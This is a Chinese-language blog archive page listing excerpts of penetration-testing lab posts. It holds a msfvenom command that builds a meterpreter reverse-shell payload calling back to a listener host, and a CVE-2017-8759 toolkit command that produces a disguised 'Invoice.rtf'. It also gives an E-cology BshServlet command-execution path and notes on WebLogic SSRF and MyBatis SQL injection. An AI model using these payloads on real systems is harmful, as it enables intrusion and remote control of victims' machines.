03 2021 档案
摘要:kali下载python脚本,生成rtf文件: **下载脚本:**git clone https://github.com/bhdresh/CVE-2017-8759.git 生成rtf文件: python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf
阅读全文
摘要:环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 放到VPS上,这里我们放到本机搭
阅读全文
摘要:# -*-coding:utf-8-*- # @Author:malphite.tang import json import requests from queue import Queue requests.packages.urllib3.disable_warnings() # 消除eque
阅读全文
摘要:python2语法:python -m SimpleHTTPServer python3语法:python -m http.server 在局域网中使用web去访问http:/IP:8000即可 可以指定端口号: python -m SimpleHTTPServer 8111 可以指定路径: cd到
阅读全文
摘要:一、环境搭建和知识储备 1.1、影响版本 漏洞编号:CVE-2014-4210 weblogic 10.0.2.0 weblogic 10.3.6.0 1.2、Docker搭建环境 1.进入vulhub/fastjson,启动docker即可 cd /root/vulhub/weblogic/ssr
阅读全文
摘要:本地Markdown文件上传到博客 参考:https://www.cnblogs.com/ccylhw/p/13954153.html 1.Typora 最漂亮的写作APPhttps://www.typora.io/ 2.Typroa到博客园 第一步:下载dotnet-sdk并安装 dotnet下载
阅读全文
摘要:漏洞复现 影响版本: E-cology 7.0 E-cology 8.0 E-cology 8.1 E-cology 9.0 直接在网站根目录后加入组件访问路径 /weaver/bsh.servlet.BshServlet/,如下图执行了命令“whoami” 绕过方式: 1.unicode编码 2.
阅读全文
摘要:Mybatis框架下易产生SQL注入漏洞的情况主要分为以下三种: 1、模糊查询 Select * from news where title like ‘%#{title}%’ 在这种情况下使用#程序会报错,新手程序员就把#号改成了$,这样如果java代码层面没有对用户输入的内容做处理势必会产生SQ
阅读全文

浙公网安备 33010602011771号